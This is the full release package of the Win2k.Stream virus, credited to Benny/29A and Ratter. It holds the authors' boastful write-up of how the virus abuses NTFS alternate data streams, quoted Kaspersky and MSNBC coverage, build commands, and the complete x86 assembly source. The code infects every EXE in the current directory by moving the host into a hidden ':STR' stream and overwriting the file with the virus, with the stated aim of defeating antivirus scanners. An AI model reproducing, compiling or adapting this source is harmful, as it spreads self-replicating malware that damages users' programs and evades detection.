COMMENT# ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Win2k.Stream ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ by Benny/29A and Ratter ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Let us introduce very small and simple infector presenting how to use features of NTFS in viruses. This virus loox like standard Petite-compressed PE file. However, it presents the newest way of PE file infecting method. How the virus worx? It uses streamz, the newest feature of NTFS filesystem and file compression, already implemented in old NTFS fs. ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Basic principles of NTFS streamz ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ How the file loox? Ya know that the file contains exactly the same what you can see when you will open it (e.g. in WinCommander). NTFS, implemented by Windows 2000, has new feature - the file can be divided to streamz. The content what you can see when you will open the file is called Primary stream - usually files haven't more than one stream. However, you can create NEW stream ( = new content) in already existing file without overwritting the content. Example: addressing of primary stream -> e.g. "calc.exe" addressing of other streamz -> : e.g. "calc.exe:stream" If you have NTFS, you can test it. Copy to NTFS for instance "calc.exe", and then create new file "calc.exe:stream" and write there "blahblah". Open "calc.exe". Whats there? Calculator ofcoz. Now open "calc.exe:stream". Whats there? "blahblah", the new file in the old one :) Can you imagine how useful r streamz for virus coding? The virus infects file by moving the old content to the new stream and replacing the primary stream with virus code. File (calc.exe) before infection: ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄPrimary stream (visible part)Ä¿º º³ Calculator ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ File (calc.exe) after infection: ÉÍCalc.exeÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄPrimary stream (calc.exe)Ä¿ÚÄNext stream (calc.exe:STR)Ä¿ º º³ Virus ³³ Calculator ³ º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ º ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Simple and efficent, ain't it? ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ Details of virus ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ * The virus infects all EXE files in actual directory. * The virus uses as already-infected mark file compression. All infected files are compressed by NTFS and virus then does not infect already compressed files. Well, almost all files after infection r smaller than before, so user won't recognize virus by checking free disk space :) * If user will copy the infected file to non-NTFS partition (in this case only primary stream is copied), the host program will be destroyed and instead of running host program virus will show message box. That can be also called as payload :P * The virus is very small, exactly 3628 bytes, becoz it's compressed by Petite 2.1 PE compression utility (http://www.icl.ndirect.co.uk/petite/). * The disinfection is very easy - just copy the content of :STR to and delete :STR. If you want to create sample of infected file, then just copy the virus to some file and copy any program (host program) to :STR. Thats all! However, AVerz have to rebuild their search engine to remove this virus, becoz until now, they had no fucking idea what are streamz :) * This virus was coded in Czech Republic by Benny/29A and Ratter, on our common VX meeting at Ratter's city... we just coded it to show that Windows 2000 is just another OS designed for viruses... it really is :) * We would like to thank GriYo for pointing us to NTFS new features. The fame is also yourz, friend! ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ In the media ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ AVP's description: ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ This is the first known Windows virus using the "stream companion" infection method. That method is based on an NTFS feature that allows to create multiple data streams associated with a file. *NTFS Streams* --------------- Each file contains at least one default data stream that is accessed just by the file name. Each file may also contain additional stream(s) that can be accessed by their personal names (filename:streamname). The default file stream is the file body itself (in pre-NTFS terms). For instance, when an EXE file is executed the program is read from the default file stream; when a document is opened, its content is also read from the default stream. Additional file streams may contain any data. The streams cannot be accessed or modified without reference to the file. When the file is deleted, its streams are deleted as well; if the file is renamed, the streams follow its new name. In the Windows package there is no standard tool to view/edit file streams. To "manually" view file streams you need to use special utilities, for instance the FAR utility with the file steams support plug-in (Ctrl-PgDn displays file streams for selected file). *Virus Details* ---------------- The virus itself is a Windows application (PE EXE file) compressed using the Petite PE EXE file compressor and is about 4K in size. When run it infects all EXE files in the current directory and then returns control to the host file. If any error occurs, the virus displays the message: Win2k.Stream by Benny/29A & Ratter This cell has been infected by [Win2k.Stream] virus! While infecting a file the virus creates a new stream associated with the victim file. That stream has the name "STR", i.e. the complete stream name is "FileName:STR". The virus then moves the victim file body to the STR stream (default stream, see above) and then overwrites the victim file body (default stream) with its (virus) code. As a result, when an infected file is executed Windows reads the default stream (which is overwritten by virus code) and executes it. Also, Windows reports the same file size for all infected files - that is the virus length. To release control to the host program the virus just creates a new process by accessing the original file program using the name "FileName:STR". That infection method should work on any NTFS system, but the virus checks the system version and runs only under Win2000. AVP's press release: ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ *A New Generation of Windows 2000 Viruses is Streaming Towards PC Users* ------------------------------------------------------------------------ Moscow, Russia, September 4, 2000 – Kaspersky Lab announces the discovery of W2K.Stream virus, which represents a new generation of malicious programs for Windows 2000. This virus uses a new breakthrough technology based on the "Stream Companion" method for self-embedding into the NTFS file system. The virus originates from the Czech Republic and was created at the end of August by the hackers going by the pseudonyms of Benny and Ratter. To date, Kaspersky Lab has not registered any infections resulting from this virus; however, its working capacity and ability for existence "in-the-wild" are unchallenged. "Certainly, this virus begins a new era in computer virus creation," said Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab. "The ’Stream Companion’ technology the virus uses to plant itself into files makes its detection and disinfection extremely difficult to complete.” Unlike previously known methods of file infection (adding the virus body at beginning, ending or any other part of a host file), the "Stream" virus exploits the NTFS file system (Windows NT/2000) feature, which allows multiple data streams. For instance, in Windows 95/98 (FAT) files, there is only one data stream – the program code itself. Windows NT/2000 (NTFS) enables users to create any number of data streams within the file: independent executable program modules, as well as various service streams (file access rights, encryption data, processing time etc.). This makes NTFS files very flexible, allowing for the creation of user-defined data streams aimed at completing specific tasks. "Stream" is the first known virus that uses the feature of creating multiple data streams for infecting files of the NTFS file system (see picture 1). To complete this, the virus creates an additional data stream named "STR" and moves the original content of the host program there. Then, it replaces the main data stream with the virus code. As a result, when the infected program is run, the virus takes control, completes the replicating procedure and then passes control to the host program. *"Stream" file infection procedure* ------------------------------------ File before infection File after infection ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°° main stream°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°° virus body°°°°°³ ³°°°°main stream°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³°°°°program body°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°additional stream°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°°program body°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ³°°°°°°°°°°°°°°°°°°°³ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´ ³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³ ³±±service streams±±³ ³±±service streams±±³ ³±±±±±±±±±±±±±±±±±±±³ ³±±±±±±±±±±±±±±±±±±±³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ "By default, anti-virus programs check only the main data stream. There will be no problems protecting users from this particular virus," Eugene Kaspersky continues. "However, the viruses can move to additional data streams. In this case, many anti-virus products will become obsolete, and their vendors will be forced to urgently redesign their anti-virus engines." In MSNBC's news: ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ *New trick can hide computer viruses* *But experts question danger posed by ‘Stream’ technology* ----------------------------------------------------------- Sept. 6 — A new kind of computer virus has been released, but security experts are in disagreement over just how menacing it is. The virus demonstrates a technique that future writers can use to hide their malicious software from most current antivirus scanners. But some antivirus companies are playing down the threat. THE VIRUS, CALLED W2K.STREAM, poses little threat — it was written as a relatively benign “proof of concept.” But, according to a source who requested anonymity, it was posted on several virus writer Web sites over Labor Day weekend — making copycats possible. The virus takes advantage of a little-used feature included in Windows 2000 and older Windows NT systems that allows programs to be split into pieces called streams. Generally, the body of a program resides in the main stream. But other streams can be created to store information related to what’s in the main stream. Joel Scambray, author of “Hacking Exposed,” described these additional streams as “Post-it notes” attached to the main file. The problem is that antivirus programs only examine the main stream. W2K.Stream demonstrates a programmer’s ability to create an additional stream and hide malicious code there. “Certainly, this virus begins a new era in computer virus creation,” said Eugene Kaspersky, Head of Anti-Virus Research at Kaspersky Lab, in a press release. “The ‘Stream Companion’ technology the virus uses to plant itself into files makes its detection and disinfection extremely difficult to complete.” *THIS BUG ISN’T DANGEROUS* --------------------------- No W2K.stream infections have been reported, and experts don’t believe the virus is “in the wild” — circulating on the Internet — yet. At any rate, this virus actually makes things easy for antivirus companies. If a user is infected, the program creates an alternate stream and places the legitimate file in this alternate location; the virus replaces it as the main stream. That makes detection by current antivirus products easy. But future viruses could do just the opposite, evading current antivirus products. One antivirus researcher who requested anonymity called release of the bug “somewhat akin to the first macro virus.” He added that reengineering antivirus software to scan for multiple streams would be a complicated effort. “In this case, many anti-virus products will become obsolete, and their vendors will be forced to urgently redesign their anti-virus engines,” Kaspersky said. *AN OLD ISSUE* --------------- There is nothing new about the potential of exploiting the multiple stream issue; Scambray hints at the problem in the book “Hacking Exposed,” and described it even more explicitly in a 1998 Infoworld.com article. The SANS Institute, a group of security researchers, issued an “alert” criticizing antivirus companies for not updating their products to scan the contents of any file stream earlier. “We found that the scanners were incapable of identifying viruses stored within an alternate data stream,” the report said. “For example if you create the file MyResume.doc:ILOVEYOU.vbs and store the contents of the I Love You virus within the alternate data stream file, none of the tested virus scanners were capable of finding the virus during a complete disk scan.” But some antivirus companies described the threat as minimal because the alternate stream trick only hides the bug while it’s stored on a victim’s computer. Pirkka Palomaki, Director of Product Marketing for F-Secure Corp., said for the virus to actually run, it has to come out of hiding and load into main memory. “It would be detected as it tried to activate,” Palomaki said. “But this signifies importance of real-time protection.” He added the virus would still have to find its way onto a victim’s computer; and that victim would have to be tricked into installing the virus using one of the traditional methods, such as clicking on an infected e-mail attachment. “It could increase the ability to for scanners to miss something,” said Pat Nolan, virus researcher at McAfee Corp. “But we’re on top of it. If there is a vulnerability, it will be short-lived.” ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ³ How to compile it? ³ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Use Petite version 2.1 (http://www.icl.ndirect.co.uk/petite/). tasm32 /ml /m9 /q stream tlink32 -Tpe -c -x -aa stream,,,import32 pewrsec stream.exe petite -9 -e2 -v1 -p1 -y -b0 -r* stream.exe And here comes the virus source... # .586p .model flat,stdcall include win32api.inc ;include filez include useful.inc extrn ExitProcess:PROC ;used APIz extrn VirtualFree:PROC extrn FindFirstFileA:PROC extrn FindNextFileA:PROC extrn FindClose:PROC extrn WinExec:PROC extrn GetCommandLineA:PROC extrn GetModuleFileNameA:PROC extrn DeleteFileA:PROC extrn ReadFile:PROC extrn CopyFileA:PROC extrn WriteFile:PROC extrn CreateFileA:PROC extrn CloseHandle:PROC extrn MessageBoxA:PROC extrn GetFileSize:PROC extrn VirtualAlloc:PROC extrn DeviceIoControl:PROC extrn GetFileAttributesA:PROC extrn GetTempFileNameA:PROC extrn CreateProcessA:PROC extrn GetVersion:PROC FSCTL_SET_COMPRESSION equ 9 shl 16 or 3 shl 14 or 16 shl 2 ;compression flag STARTUPINFO STRUCT ;used by CreateProcessA API cb DWORD ? lpReserved DWORD ? lpDesktop DWORD ? lpTitle DWORD ? dwX DWORD ? dwY DWORD ? dwXSize DWORD ? dwYSize DWORD ? dwXCountChars DWORD ? dwYCountChars DWORD ? dwFillAttribute DWORD ? dwFlags DWORD ? wShowWindow WORD ? cbReserved2 WORD ? lpReserved2 DWORD ? hStdInput DWORD ? hStdOutput DWORD ? hStdError DWORD ? STARTUPINFO ENDS PROCESS_INFORMATION STRUCT hProcess DWORD ? hThread DWORD ? dwProcessId DWORD ? dwThreadId DWORD ? PROCESS_INFORMATION ENDS @pushvar macro variable, empty ;macro for pushing variablez local next_instr ifnb %out too much arguments in macro '@pushvar' .err endif call next_instr variable next_instr: endm .data extExe db '*.exe',0 ;search mask fHandle dd ? ;file search handle file_name db MAX_PATH dup(?) ;actual program name db MAX_PATH dup(?) file_name2 db MAX_PATH dup(?) ;temprorary file db 4 dup (?) WFD WIN32_FIND_DATA ? ;win32 find data proc_info PROCESS_INFORMATION <> ;used by CreateProcessA startup_info STARTUPINFO <> ;... .code Start: ;start of virus call GetVersion ;get OS version cmp al,5 ;5 = Win2000 jnz msgBox ;quit if not Win2000 mov edi,offset file_name push MAX_PATH push edi push 0 call GetModuleFileNameA ;get path+filename of actual ;program push offset WFD push offset extExe call FindFirstFileA ;find first file to infect test eax,eax jz end_host mov [fHandle],eax ;save handle search_loop: call infect ;try to infect file push offset WFD push dword ptr [fHandle] call FindNextFileA ;try to find next file test eax,eax jne search_loop ;and infect it push dword ptr [fHandle] call FindClose ;close file search handle end_host: mov esi,offset file_name ;get our filename push esi @endsz dec esi mov edi,esi mov eax,"RTS:" ;append there :"STR" stream stosd ;name pop esi call GetCommandLineA ;get command line xchg eax,edi ;to EDI ;esi - app name ;edi - cmd line xor eax,eax push offset proc_info push offset startup_info push eax push eax push eax push eax push eax push eax push edi push esi call CreateProcessA ;jump to host code xchg eax,ecx jecxz msgBox ;if error, show message box end_app: push 0 call ExitProcess ;exit msgBox: push 1000h ;show some lame msg box :) @pushsz "Win2k.Stream by Benny/29A & Ratter" ;copyleft :] @pushsz "This cell has been infected by [Win2k.Stream] virus!" push 0 ;with name of virus and authorz call MessageBoxA jmp end_app infect: push offset [WFD.WFD_szFileName] call GetFileAttributesA ;check if the file is NTFS test eax,800h ;compressed = already infected jz next_infect ret ;quit then next_infect: push offset [WFD.WFD_szFileName] mov byte ptr [flagz],OPEN_EXISTING call Create_File ;open found program jz infect_end xor eax,eax push eax @pushvar
push eax push eax push 4 @pushvar
;default compression push FSCTL_SET_COMPRESSION push ebx ;NTFS compress it = call DeviceIoControl ;mark as already infected ; = and save disk space :) push ebx call CloseHandle ;close file handle mov esi,offset file_name2 push esi push 0 @pushsz "str" @pushsz "." call GetTempFileNameA ;create name for temp file test eax,eax jz infect_end mov edi,offset [WFD.WFD_szFileName] push 0 push esi push edi call CopyFileA ;copy there victim program test eax,eax jz infect_end push 0 push edi push offset file_name call CopyFileA ;copy ourself to victim program push esi mov esi,edi @endsz xchg esi,edi dec edi mov eax,"RTS:" ;append :"STR" stream to stosd ;victim program filename xor al,al stosb call Create_File ;open victim file jz infect_end push 0 push ebx call GetFileSize ;get its size xchg eax,edi push PAGE_READWRITE push MEM_COMMIT or MEM_RESERVE push edi push 0 call VirtualAlloc ;allocate enough memory test eax,eax ;for file content jz infect_end_handle xchg eax,esi xor eax,eax push eax @pushvar push edi push esi push ebx call ReadFile ;read file content to test eax,eax ;allocated memory jz infect_end_handle push ebx call CloseHandle ;close its file handle push offset file_name2 call DeleteFileA ;delete temporary file mov byte ptr [flagz],CREATE_ALWAYS push offset [WFD.WFD_szFileName] call Create_File ;open stream jz infect_end_dealloc push 0 mov ecx,offset file_size push ecx push dword ptr [ecx] push esi push ebx call WriteFile ;write there victim program test eax,eax jz infect_end_handle infect_end_handle: push ebx call CloseHandle ;close its file handle infect_end_dealloc: push MEM_DECOMMIT push dword ptr [file_size] push esi call VirtualFree ;free allocated memory push MEM_RELEASE push 0 push esi call VirtualFree ;release reserved part of mem infect_end: ret ; [esp+4] - file_name Create_File: ;proc for opening file xor eax,eax push eax push eax db 6ah flagz db OPEN_EXISTING ;variable file open flag push eax push eax push GENERIC_READ or GENERIC_WRITE push dword ptr [esp+1ch] call CreateFileA ;open file xchg eax,ebx ;handle to EBX inc ebx ;is EBX -1? lahf ;store flags dec ebx ;correct EBX sahf ;restore flags retn 4 ;quit from proc end Start ;end of virus